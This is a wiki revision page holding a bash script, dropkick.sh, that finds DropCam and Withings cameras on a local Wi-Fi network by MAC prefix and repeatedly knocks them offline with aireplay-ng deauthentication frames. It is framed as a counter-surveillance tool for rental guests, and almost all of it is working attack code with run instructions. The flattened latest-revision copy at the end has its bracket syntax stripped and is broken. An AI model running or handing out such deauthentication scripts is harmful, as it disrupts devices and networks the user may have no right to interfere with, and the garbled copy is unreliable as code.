Difference between revisions of "Drop Wifi Cams"
| (One intermediate revision by the same user not shown) | |||
| Line 1: | Line 1: | ||
| − | + | [https://julianoliver.com/output/log_2015-12-18_14-39 Script Source] | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | shopt -s nocasematch # Set shell to ignore case | + | #!/bin/bash |
| − | shopt -s extglob # For non-interactive shell. | + | # |
| − | + | # DROPKICK.SH | |
| − | readonly NIC=$1 # Your wireless NIC | + | # |
| − | readonly BSSID=$2 # Network BSSID (AirBnB WiFi network) | + | # Detect and Disconnect the DropCam and Withings devices some people are using to |
| − | readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }') | + | # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh: |
| − | # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not | + | # |
| − | # present. | + | # http://julianoliver.com/output/log_2014-05-30_20-52 |
| − | readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings | + | # |
| − | readonly POLL=30 # Check every 30 seconds | + | # This script was named by Adam Harvey (http://ahprojects.com), who also |
| − | readonly LOG=/var/log/dropkick.log | + | # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi, |
| − | + | # etc) and the aircrack-ng suite. I put 'beep' in there for a little audio | |
| − | airmon-ng stop mon0 # Pull down any lingering monitor devices | + | # notification. Comment it out if you don't need it. |
| − | airmon-ng start $NIC # Start a monitor device | + | # |
| − | + | # See also http://plugunplug.net, for a plug-and-play device that does this | |
| − | while true; | + | # based on OpenWrt. Code here: |
| − | + | # | |
| − | + | # https://github.com/JulianOliver/CyborgUnplug | |
| − | + | # | |
| − | + | # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows: | |
| − | + | # | |
| − | + | # sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT> | |
| − | + | ||
| − | + | shopt -s nocasematch # Set shell to ignore case | |
| − | + | shopt -s extglob # For non-interactive shell. | |
| − | + | ||
| − | + | readonly NIC=$1 # Your wireless NIC | |
| − | + | readonly BSSID=$2 # Network BSSID (AirBnB WiFi network) | |
| − | + | readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }') | |
| − | + | # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not | |
| − | + | # present. | |
| − | + | readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings | |
| − | + | readonly POLL=30 # Check every 30 seconds | |
| − | + | readonly LOG=/var/log/dropkick.log | |
| − | + | ||
| − | + | airmon-ng stop mon0 # Pull down any lingering monitor devices | |
| − | + | airmon-ng start $NIC # Start a monitor device | |
| − | + | ||
| − | + | while true; | |
| − | + | do | |
| − | + | for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \ | |
| − | done | + | '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}') |
| − | airmon-ng stop mon0 | + | do |
| + | if [[ "$TARGET" == "$GGMAC" ]] | ||
| + | then | ||
| + | # Audio alert | ||
| + | beep -f 1000 -l 500 -n 200 -r 2 | ||
| + | echo "WiFi camera discovered: "$TARGET >> $LOG | ||
| + | aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 | ||
| + | echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG | ||
| + | echo ' | ||
| + | __ __ _ __ __ | ||
| + | ___/ /______ ___ / /__ (_)___/ /_____ ___/ / | ||
| + | / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ / | ||
| + | \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/ | ||
| + | /_/ | ||
| + | |||
| + | ' | ||
| + | else | ||
| + | echo $TARGET": is not a DropCam or Withings device. Leaving alone.." | ||
| + | fi | ||
| + | done | ||
| + | echo "None found this round." | ||
| + | sleep $POLL | ||
| + | done | ||
| + | airmon-ng stop mon0 | ||
Latest revision as of 17:53, 19 December 2015
#!/bin/bash # # DROPKICK.SH # # Detect and Disconnect the DropCam and Withings devices some people are using to # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh: # # http://julianoliver.com/output/log_2014-05-30_20-52 # # This script was named by Adam Harvey (http://ahprojects.com), who also # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi, # etc) and the aircrack-ng suite. I put 'beep' in there for a little audio # notification. Comment it out if you don't need it. # # See also http://plugunplug.net, for a plug-and-play device that does this # based on OpenWrt. Code here: # # https://github.com/JulianOliver/CyborgUnplug # # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows: # # sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT> shopt -s nocasematch # Set shell to ignore case shopt -s extglob # For non-interactive shell. readonly NIC=$1 # Your wireless NIC readonly BSSID=$2 # Network BSSID (AirBnB WiFi network) readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }') # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not # present. readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings readonly POLL=30 # Check every 30 seconds readonly LOG=/var/log/dropkick.log airmon-ng stop mon0 # Pull down any lingering monitor devices airmon-ng start $NIC # Start a monitor device while true; do for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \ '(xdigit:{1,2}:){5}xdigit:{1,2}') do if "$TARGET" == "$GGMAC" then # Audio alert beep -f 1000 -l 500 -n 200 -r 2 echo "WiFi camera discovered: "$TARGET >> $LOG aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG echo ' __ __ _ __ __ ___/ /______ ___ / /__ (_)___/ /_____ ___/ / / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ / \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/ /_/ ' else echo $TARGET": is not a DropCam or Withings device. Leaving alone.." fi done echo "None found this round." sleep $POLL done airmon-ng stop mon0
